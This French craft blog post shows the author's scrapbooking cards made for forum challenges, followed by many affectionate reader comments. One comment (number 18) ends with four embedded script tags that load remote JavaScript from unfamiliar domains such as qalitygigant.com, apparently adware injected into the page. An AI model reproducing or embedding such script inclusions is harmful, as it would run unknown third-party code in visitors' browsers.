• Mes Cartes pour le forum

     

     

    Mes Cartes pour le forum

     

     

    Bonjour à toutes,

    On se retrouve aujourd'hui pour vous montrer les cartes réalisées pour le Forum "Le scrap dans tous ses états" ...

     

     

    Mes Cartes pour le forum

     

     

    En réponse à l'Acrostiche de Janvier que voici...

     

     

    Mes Cartes pour le forum

     

     

     

     

    Mes Cartes pour le forum

     

     

     

     

    Mes Cartes pour le forum

     

     

    Pour répondre au défi de la St Valentin dans lequel il fallait utiliser des cœurs sur sa carte ou sa page...

     

     

    Mes Cartes pour le forum

     

     

     

     

    Mes Cartes pour le forum

     

     

    Pour répondre à la dictée de Danie... ( Une Dictée : Le principe est simple, on vous dicte étape par étape ce que vous devez faire en détails : dimension de la découpe du papier , comment coller, etc..." sans jamais savoir exactement ce que va être le résultat... la carte se dévoile sous vos yeux !). Le choix du papier et le décor vous appartient....

     

     

    Mes Cartes pour le forum

     

     

     

     

    Mes Cartes pour le forum

     

     

     

     

    Mes Cartes pour le forum

     

    {Rubrique "Merci Visites"-"Printemps" ICI }

     

    Merci aussi pour tous vos commentaires que j'adore lire ♥♥♥

     

     

     

     

    Mes Cartes pour le forum

     

     

     

     

    Mes Cartes pour le forum

     

    { Rubrique "Jours"-"Mardi"-"Printemps" ICI }

     

     


    Tags Tags : , , , , ,
  • Commentaires

    36
    Lundi 8 Mars 2021 à 18:06

    Elles sont magnifiques tes cartes j'aime beaucoup celle avec le chat .Bisous

    35
    gaelle
    Lundi 8 Mars 2021 à 17:39

    j'aime toutes tes creas, mais j'ai un coup de coeur pour la carte que tu as realisé en suivant la dictée de danie.

    Style steampunk si je ne me trompe pas et je l'adore!!!!!

    biz

    gaelle

    34
    Jeudi 25 Février 2021 à 22:47
    On se sent tellement bien sur notre forum qu'il n'est pas bien compliqué de faire de jolies créations ! Et au fur et à mesure que tu fais les créa je te vois t'épanouir ! Gros bisous
    33
    Jeudi 25 Février 2021 à 17:09

    Très jolies tes cartes. J'aime beaucoup l'univers de la dernière. 

    Bises

    Thaly

    32
    Jeudi 25 Février 2021 à 06:19

    Tu as merveilleusement oeuvré et tout tes défis sont réussis ma tite Valie, bravo!

    Bisous et belle journée

    31
    Mercredi 24 Février 2021 à 20:05

    Bonsoir ma douce Valie

    Je vais pas trop mal , un peu de douleurs mais comme j'ai la fibromyalgie j'ai l'habitude 

    Je suis contente de savoir que tu vas bien, bonne et douce soirée et gros bisous d'amitié

    ton amie Janine

    30
    Mercredi 24 Février 2021 à 19:26
    dane

    coucou Valie félicitations pour tes cartes elles sont topissimes vraiment bravo  pleins de bisous a très vite 

    29
    Mercredi 24 Février 2021 à 18:19

    Magnifiques tes faits mains ma Valie, et surtout quelle patience, je me souviens quand je faisais moi aussi en plus je mettais des perles de çi de là my god quel boulot, mais quand le résultat est là comme on est fières

    Il a fait plus de 20° ce jour, j ai fait une belle ballade et tu te rend compte je ne suis pas couchée je travaille encore, j ai tellement peur quand le soir arrive, il y a un tel silence à cause du confinement et ici les gens doivent se coucher au gouter ce n est pas possible

    Porte toi bien ma douce et sache que je suis là, fidèle en amitie et demain je reçois mes anciennes voisines pour mon anniversaire je ne sais pas ce que cela va donner car je souffre mais ça va faire du bien elle ssont si gentilles , bisous d affection

    28
    Mercredi 24 Février 2021 à 09:01

    Superbes tes cartes Valie ! Bravo +++ pour celle de la dictée ! J'adore !

    Bonne journée ! Bisous bisous !

    27
    Mercredi 24 Février 2021 à 08:43

    Bonjour Valie 

    de bien jolies cartes ! Bravo !

    je n'ai jamais essayé de réaliser a faire ce scrap ! c'est difficile je pense ! toi tu te débrouilles très bien et tu nous en  fait bien profiter pour cela un grand merci .

    Belle et douce journée avec de gros bisous 

    26
    Mardi 23 Février 2021 à 20:35

    Très belles tes cartes défi relevé pour chacune,

    Gros bisous Pierrette67

    25
    Mardi 23 Février 2021 à 20:24

    Bonsoir ma douce Valie

    De belles cartes comme toujours au top comme tu sais si bien les faires 

    J'espère que tu vas bien et je te souhaite une bonne soirée et t'envoie de gros bisous d'amitié

    ton amie Janine

    24
    Mardi 23 Février 2021 à 18:42

    Elles sont toutes magnifiques, j'ai cependant une préférence pour la dictée de Danie, moi, je n'y comprenait rien, elle m'a envoyé la photo et la subitement EUREKA, la lumière a jaillit, j'y suis arrivée. Alors bravo à toi qui l'a faite selon les indications seulement ! bravo gros bisous.

    23
    Mardi 23 Février 2021 à 17:13

    Coucou ma belle Valie, je dirais de tes cartes qu'elles sont "savoureuses". Passe une belle fin de journée, bisou rose tendresse !

     

    22
    Mardi 23 Février 2021 à 16:49

    Mes Cartes pour le forum

    j'adooore cette image.  Bravo et merci du grand partage de ton talent.

    https://i.postimg.cc/pLcyQF9J/chien-fille-evy.gif

    21
    Mardi 23 Février 2021 à 16:11

    Bravo Valie pour ce beau travail imposé!

    Merci pour les deux signatures, elles sont très belles!

    Je te souhaite un excellent mardi

    Douces pensées et gros bisous

    20
    Jacline-H-49
    Mardi 23 Février 2021 à 14:35

    Bonjour ma Valie,

    mes préférées, la une et la deux. Belles réussites !!!

    Félicitations ♥ ♥ 

    GROS BISOUS pour un bel après midi ensoleillé. 

    Jacline 

     

     

    19
    Mardi 23 Février 2021 à 13:59

    Un p'tit coucou en passant, j'espère que tu vas le mieux possible.

    aujourd'hui le soleil et de retour, c'est un petit avant goût du printemps

    tes créations sont  splendides , je t'ai piqué ta création bisous merci 

     je viens de terminer  le nettoyage de la terrasse 

    et du salon de jardin  au karcher et mon dos a dit stop .....

    je te souhaite une excellente semaine et 

    Bisous Frane 

    18
    mamijojo77100
    Mardi 23 Février 2021 à 13:22

    bien sympa tout cela..J aime le petit chat devant la jonquille..  GBISOUS  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1614082857554" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    17
    Mardi 23 Février 2021 à 11:47

    Très jolies tes cartes pour ces défis!! Bravo à toi......

    Bisous et douce journée

    16
    Mardi 23 Février 2021 à 10:39

    Coucou Valie ! Tes cartes sont toutes très belles ! Un gros coup de coeur pour la première ! Passe une belle journée sous le soleil ! Ce sera jardinage pour moi cet après-midi après la couture de ces derniers jours ! Bisous

    15
    Mardi 23 Février 2021 à 10:38

    Tes cartes sont Superbes ma Valie, Bravo tu as encore superbement œuvré !!

    Je te souhaite une belle journée, prends bien soin de toi & à très vite de te retrouver.

    Doux Bisous affectueux.

    14
    Mardi 23 Février 2021 à 10:30
    Hélène

    Une très jolie série, avec un coup de coeur pour la première que je trouve vraiment superbe !!
    Les dictées je ne suis pas fan, j'ai déja testé, mais je n'aime pas, ne pas savoir où je vais ! Bravo en tout cas, te voilà bien active et bien créative !! (encore plus que d'habitude)
    Je te félicite !! Gros Bisous

    13
    Mardi 23 Février 2021 à 10:03

    Je trouve que tu t adaptes bien aux consignes et tu realises des cartes que tu n as pas l habitude de faire et elles sont réussies bravo 

    Trop bien la steampunk

    J adore tous tes gifs animés un peu partout les petits chats trop mimi 

    Bisous bonne journée a toi

    12
    marianne
    Mardi 23 Février 2021 à 09:58

    De très jolies créations, bravo ma belle !!

    Gros bisous

    Marianne

    11
    Jour de mai
    Mardi 23 Février 2021 à 09:31

    Coucou Valie, 

    En lisant ton post et découvrant tes cartes, je ne peux que te retourner le compliment. C'est magnifique, j'adore, avec le temps j'arriverai peut-être à en réaliser. En tout cas cela donne de l'inspiration. Bravo et merci pour le partage.

    Le soleil arrive, la journée devrait être meilleure qu'hier. Balade en perspective.

    Quoi que tu fasses, excellent mardi et de très gros bisous ♥♥♥♥♥

    LN

    10
    Jeannine (cristal24)
    Mardi 23 Février 2021 à 09:15

    Très jolies cartes; bravo.

    Bonne semaine.  Bises.

    Jeannine

    9
    Mardi 23 Février 2021 à 09:14
    lamanuelle25

    De jolies cartes pour ces défis! Bises Nadine

    8
    Mardi 23 Février 2021 à 09:12

    Beaux résultats pour les trois, difficile de choisir entre elles s'il le fallait

    Bravo à toi

    Bonne journée

    Gros bisous

    7
    Mardi 23 Février 2021 à 08:47

    Coup de coeur pour la première carte !

    bonne journée ; bisous / Nicole

    6
    Mardi 23 Février 2021 à 08:38

      de  très  jolie  cartes  bravo 

      j'adore  les  deux  premières  pour  leur  douceur 

    gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    5
    Mardi 23 Février 2021 à 08:24

    bravo valie pour tes magnifiques créas ! quel joli travail

    bisous

    4
    Anges
    Mardi 23 Février 2021 à 08:14

    Déjà je commence par te ire chapeau pour tous les challenges que tu as réalisé :-)

    Ta carte pour la dictée est sublime, elle a fait son petit effet sur le forum, je l'adore ♥

    Une carte St Valentin toute douce et je trouve celle de l'acrostiche de janvier trop mignonne et ce format rond est original, j'aime beaucoup ♥ ♥

    Bonne journée, bises. Laurence

    3
    Mardi 23 Février 2021 à 07:44

    elles sont tout simplement géniales, bravo!! bisous bon mardi

    2
    Mardi 23 Février 2021 à 07:42

    hello Valie 

    superbes cartes !! j'aime beaucoup

    J'espère que nous n'aurons pas de pluie aujourd'hui 

     bisous

    1
    Mardi 23 Février 2021 à 07:41

    Bonjour ma Valie, que de très belles cartes c'est un vrai plaisir....

    Je te souhaite un très beau et bon mardi

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :